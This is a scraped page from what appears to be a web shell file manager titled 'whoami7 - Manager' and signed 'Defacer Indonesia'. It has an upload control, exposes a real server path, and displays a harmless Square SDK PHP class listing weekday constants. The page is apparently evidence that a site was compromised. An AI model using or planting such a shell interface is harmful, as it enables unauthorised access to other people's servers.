whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
square
/
square
/
src
/
Models
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/square/square/src/Models/Weekday.php
<?php declare(strict_types=1); namespace Square\Models; /** * The days of the week. */ class Weekday { /** * Monday */ public const MON = 'MON'; /** * Tuesday */ public const TUE = 'TUE'; /** * Wednesday */ public const WED = 'WED'; /** * Thursday */ public const THU = 'THU'; /** * Friday */ public const FRI = 'FRI'; /** * Saturday */ public const SAT = 'SAT'; /** * Sunday */ public const SUN = 'SUN'; }
Copyright ©2021 || Defacer Indonesia